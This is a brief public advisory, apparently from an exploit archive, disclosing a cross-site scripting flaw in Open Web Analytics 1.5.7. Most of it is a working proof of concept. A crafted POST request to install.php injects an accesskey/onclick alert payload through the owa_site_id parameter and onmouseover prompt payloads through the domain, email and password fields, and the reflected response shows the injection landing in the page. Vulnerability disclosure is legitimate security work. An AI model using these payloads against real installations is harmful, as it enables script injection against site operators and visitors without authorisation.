Open Web Analytics 1.5.7 Cross Site Scripting

`Exploit Title: Open Web Analytics v1.5.7 Cross-Site Scripting  
Author: 1N3 @CrowdShield https://crowdshield.com  
Vendor: http://www.openwebanalytics.com/  
Date: 02/24/2016  
  
Description:  
Open Web Analytics suffers from a Cross-Site Scripting vulnerability in the owa_site_id parameter because it fails to sanitize input before rendering the content to the user. The vulnerability can be triggered by hitting the ALT+SHIFT+X key after the payload is injected.  
  
Request:  
POST /install.php?owa_site_id=1"/accesskey="X"/onclick="alert(1)"><!--%20&owa_do=base.installDefaultsEntry& HTTP/1.1  
Host: web.kiwi.ki  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://web.kiwi.ki/install.php?owa_site_id=&owa_do=base.installDefaultsEntry&  
Cookie: owa_v=cdh%3D%3Ea2fc6dac%7C%7C%7Cvid%3D%3E1456351264222521405%7C%7C%7Cfsts%3D%3E1456351264%7C%7C%7Cdsfs%3D%3E0%7C%7C%7Cnps%3D%3E1; owa_s=cdh%3D%3Ea2fc6dac%7C%7C%7Clast_req%3D%3E1456351264%7C%7C%7Csid%3D%3E1456351264683274933%7C%7C%7Cdsps%3D%3E0%7C%7C%7Creferer%3D%3E%28none%29%7C%7C%7Cmedium%3D%3Edirect%7C%7C%7Csource%3D%3E%28none%29%7C%7C%7Csearch_terms%3D%3E%28none%29  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 295  
  
owa_protocol=http%3A%2F%2F&owa_domain=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_email_address=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_password=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_nonce=4076e70a50&owa_action=base.installBase&owa_save_button=Continue...  
  
Response:  
<input size="70" name="owa_go" value="https://web.kiwi.ki/install.php?owa_site_id=1" accesskey="X" onclick="alert(1)" type="hidden"><!--%20&owa_do=base.installDefaultsEntry&">  
`